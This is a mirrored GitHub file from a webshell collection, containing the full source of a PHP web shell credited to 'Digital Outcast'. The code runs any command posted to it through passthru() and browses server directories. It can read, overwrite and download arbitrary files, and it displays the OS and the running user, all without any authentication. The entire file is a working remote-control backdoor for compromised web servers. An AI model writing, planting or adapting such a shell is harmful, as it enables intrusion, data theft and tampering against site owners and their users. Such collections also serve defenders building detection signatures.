mirror of
https://github.com/tennc/webshell
synced 2024-11-28 22:20:17 +00:00
268 lines
69 KiB
Text
268 lines
69 KiB
Text
|
<?php
|
||
|
|
||
|
//This PHP Web Shell was developed by Digital Outcast It is open software and completely free to modify in any way you wish. Have fun and don't be all skiddy and just take credit for creating it. Bad things will happen if you do.
|
||
|
$images = array( "banner" =>"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".
|
||
|
"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", "edit" => "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
|
||
|
"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
|
||
|
"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
|
||
|
"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
|
||
|
"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
|
||
|
"zMshADs=");
|
||
|
|
||
|
//This function sends the appropriate headers to handle the image (This is just GIF images easily modifiable
|
||
|
if (isset($_GET['img']))
|
||
|
{
|
||
|
header("Content-type: image/gif");
|
||
|
echo base64_decode($images[$_GET['img']]);
|
||
|
die();
|
||
|
}
|
||
|
//Sets the directory to the directory specified
|
||
|
if (isset($_GET['dir']))
|
||
|
{
|
||
|
$current_dir = realpath($_GET['dir'])."/";
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$current_dir = './';
|
||
|
}
|
||
|
|
||
|
//Run a CLI command if one has been sent
|
||
|
if (isset($_POST['CLICommand']))
|
||
|
{
|
||
|
echo "<pre>";
|
||
|
echo "<b>Output From Command: </b><br />";
|
||
|
echo "<textarea cols='120' rows='25'>";
|
||
|
passthru($_POST['CLICommand']);
|
||
|
echo "</textarea>";
|
||
|
echo "</pre>";
|
||
|
die();
|
||
|
}
|
||
|
|
||
|
//set the current_dir url
|
||
|
if (($current_dir == './') && (!isset($_COOKIE['dshell'])))
|
||
|
{
|
||
|
$surl = $_SERVER['REQUEST_URI'];
|
||
|
setcookie('dshell',$surl,time()+99999);
|
||
|
}
|
||
|
elseif (!isset($_COOKIE['dshell']))
|
||
|
die('Error Could Not load the default path');
|
||
|
else
|
||
|
$surl = $_COOKIE['dshell'];
|
||
|
|
||
|
function scan_dir($current_dir)
|
||
|
{
|
||
|
$chemin=$current_dir;
|
||
|
if (glob("$chemin*"))
|
||
|
{
|
||
|
$files = glob("$chemin*");
|
||
|
$fileListing = "";
|
||
|
foreach ($files as $filename) {
|
||
|
$fileListing .= "$filename-<";
|
||
|
}
|
||
|
$listing = explode('-<',$fileListing);
|
||
|
return $listing;
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
die("Couldn't Read directory, Blocked!!!");
|
||
|
}
|
||
|
}
|
||
|
|
||
|
//The majority of this function was taken off of php.net, no use reinventing the wheel when this works very well :p
|
||
|
//Anyway this function gets the permssions in rwx form thats read write execute format.
|
||
|
function perms_check($file)
|
||
|
{
|
||
|
$perms = fileperms($file);
|
||
|
|
||
|
if (($perms & 0xC000) == 0xC000) {
|
||
|
// Socket
|
||
|
$info = 's';
|
||
|
} elseif (($perms & 0xA000) == 0xA000) {
|
||
|
// Symbolic Link
|
||
|
$info = 'l';
|
||
|
} elseif (($perms & 0x8000) == 0x8000) {
|
||
|
// Regular
|
||
|
$info = '-';
|
||
|
} elseif (($perms & 0x6000) == 0x6000) {
|
||
|
// Block special
|
||
|
$info = 'b';
|
||
|
} elseif (($perms & 0x4000) == 0x4000) {
|
||
|
// Directory
|
||
|
$info = 'd';
|
||
|
} elseif (($perms & 0x2000) == 0x2000) {
|
||
|
// Character special
|
||
|
$info = 'c';
|
||
|
} elseif (($perms & 0x1000) == 0x1000) {
|
||
|
// FIFO pipe
|
||
|
$info = 'p';
|
||
|
} else {
|
||
|
// Unknown
|
||
|
$info = 'u';
|
||
|
}
|
||
|
|
||
|
// Owner
|
||
|
$info .= (($perms & 0x0100) ? 'r' : '-');
|
||
|
$info .= (($perms & 0x0080) ? 'w' : '-');
|
||
|
$info .= (($perms & 0x0040) ?
|
||
|
(($perms & 0x0800) ? 's' : 'x' ) :
|
||
|
(($perms & 0x0800) ? 'S' : '-'));
|
||
|
|
||
|
// Group
|
||
|
$info .= (($perms & 0x0020) ? 'r' : '-');
|
||
|
$info .= (($perms & 0x0010) ? 'w' : '-');
|
||
|
$info .= (($perms & 0x0008) ?
|
||
|
(($perms & 0x0400) ? 's' : 'x' ) :
|
||
|
(($perms & 0x0400) ? 'S' : '-'));
|
||
|
|
||
|
// World
|
||
|
$info .= (($perms & 0x0004) ? 'r' : '-');
|
||
|
$info .= (($perms & 0x0002) ? 'w' : '-');
|
||
|
$info .= (($perms & 0x0001) ?
|
||
|
(($perms & 0x0200) ? 't' : 'x' ) :
|
||
|
(($perms & 0x0200) ? 'T' : '-'));
|
||
|
|
||
|
return $info;
|
||
|
}
|
||
|
|
||
|
|
||
|
//Function to display the files in the current_dir variable
|
||
|
function dir_scan($current_dir) {
|
||
|
$output="<tr><td><font color='red'>Filename</font></td><td><font color='red'>Permissions</font></td><td><font color='red'>Actions</font></td></tr>\n
|
||
|
<tr><td><a href='?dir=".$current_dir."./'>.</a></td></tr>\n
|
||
|
<tr><td><a href='?dir=".$current_dir."../'>..</a></td></tr>";
|
||
|
$output_left="";
|
||
|
foreach(scan_dir($current_dir) as $item)
|
||
|
{
|
||
|
if ($item == "." || $item == "..")
|
||
|
{
|
||
|
$item = str_replace($current_dir,"",$item);
|
||
|
$output .= "<tr><td width='90%'>".
|
||
|
"<a href='".$item."'>".$item."</a>".
|
||
|
"</td><td>".
|
||
|
"</td></tr>";
|
||
|
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
if ($item == "")
|
||
|
{ }
|
||
|
else
|
||
|
{
|
||
|
if (is_dir($item))
|
||
|
{
|
||
|
$perms = perms_check($item);
|
||
|
$item = str_replace($current_dir,"",$item);
|
||
|
$output .="<tr><td width='90%'>"."<a href='?dir=".$current_dir.$item."/'>".$item."</a></td><td width='10%'>$perms</td><td>  </td></tr>";
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$perms = perms_check($item);
|
||
|
$item = str_replace($current_dir,"",$item);
|
||
|
$output_left .= "<tr><td width='90%'>".
|
||
|
"<a href='".$item."'>".$item."</a>".
|
||
|
"</td><td width='10%'>$perms</td><td>".
|
||
|
"<a href='?action=download&file=".$current_dir.$item."'><img src='".$surl."?img=download' border='0'></a><a href='".$surl."?action=edit&file=".$current_dir.$item."'><img src='".$surl."?img=edit' border='0'></a><br />".
|
||
|
"</td></tr>";
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
$output .=$output_left;
|
||
|
return $output;
|
||
|
}
|
||
|
|
||
|
//Edit File Function, $mode can be r(read) w(write)
|
||
|
//Content is needed only if writing
|
||
|
function fedit($fileLocale,$mode,$content = "")
|
||
|
{
|
||
|
if ($mode == "r")
|
||
|
{
|
||
|
$output = htmlspecialchars(file_get_contents($fileLocale));
|
||
|
return $output;
|
||
|
}
|
||
|
elseif ($mode == "w")
|
||
|
{
|
||
|
if ($content == "")
|
||
|
echo("Error No Content Provided!");
|
||
|
else {
|
||
|
$file = fopen($fileLocale,"w");
|
||
|
if (fwrite($file,stripslashes($content)))
|
||
|
{
|
||
|
$value = 1;
|
||
|
}
|
||
|
else
|
||
|
$value = 0;
|
||
|
fclose($file);
|
||
|
return $value;
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
//Function for showing the edit page.
|
||
|
function edit($file)
|
||
|
{
|
||
|
return "<tr><td><center><form action='".$surl."?action=write&file=".$_GET['file']."' method='post'>
|
||
|
<textarea name='content' cols=100 rows=15>".fedit($file,'r')."</textarea><br /><input type='submit' value='Save'></center></form></td></tr>";
|
||
|
}
|
||
|
|
||
|
//Setup the Action
|
||
|
if (!isset($_GET['action']))
|
||
|
{
|
||
|
$action = dir_scan($current_dir);
|
||
|
}
|
||
|
elseif ($_GET['action'] == 'edit')
|
||
|
{
|
||
|
$action = edit($_GET['file']);
|
||
|
}
|
||
|
elseif ($_GET['action'] == 'write')
|
||
|
{
|
||
|
if (fedit($_GET['file'],'w',$_POST['content']))
|
||
|
$action = "<tr><td>Successful</td></tr>";
|
||
|
else
|
||
|
$action = "<tr><td>Error Writing File, Possible Permission Problem</td></tr>";
|
||
|
}
|
||
|
elseif ($_GET['action'] == 'download')
|
||
|
{
|
||
|
$filename = $_GET['file'];
|
||
|
$filename = trim($filename);
|
||
|
$file = $path.$filename;
|
||
|
$file_size = filesize($file);
|
||
|
if(strstr($HTTP_USER_AGENT, "MSIE 5.5")) {
|
||
|
header("Content-Type: doesn/matter");
|
||
|
header("Content-Disposition: filename=$filename");
|
||
|
header("Content-Transfer-Encoding: binary");
|
||
|
header("Pragma: no-cache");
|
||
|
header("Expires: 0");
|
||
|
}
|
||
|
else {
|
||
|
Header("Content-type: file/unknown");
|
||
|
Header("Content-Disposition: attachment; filename=".str_replace("../","",$filename));
|
||
|
Header("Content-Description: PHP3 Generated Data");
|
||
|
header("Pragma: no-cache");
|
||
|
header("Expires: 0");
|
||
|
}
|
||
|
|
||
|
if (is_file("$file")) {
|
||
|
$fp = fopen("$file", "r");
|
||
|
if (!fpassthru($fp))
|
||
|
fclose($fp);
|
||
|
}
|
||
|
die();
|
||
|
}
|
||
|
|
||
|
//Actual Output
|
||
|
echo "<html><body bgcolor='black' text='white'>\n";
|
||
|
echo "<center>\n";
|
||
|
echo "<table width='90%'>\n";
|
||
|
echo "<tr><td colspan='2'><center><img src='".$surl."?img=banner'></center></td></tr>\n";
|
||
|
echo "<tr><td colspan='2'><b>Operating System Information: </b>".php_uname()."</td></tr>\n";
|
||
|
echo "<tr><td colspan='2'><b>Server Running As: </b>".get_current_user()."</td></tr>\n";
|
||
|
echo "<tr><td colspan='2'><b>Current Directory: </b>".wordwrap(realpath($current_dir),100,'<br />')."</td></tr>\n";
|
||
|
echo $action;
|
||
|
echo "<tr><td colspan='2'> </td></tr>";
|
||
|
echo "<tr><td colspan='2'><b>Run Command: </b><form action='' method='post'><input type='text' name='CLICommand'><input type='submit' value='Run!'></form></td></tr>\n";
|
||
|
echo "</table></center>\n";
|
||
|
echo "</body></html>\n";
|
||
|
|
||
|
?>
|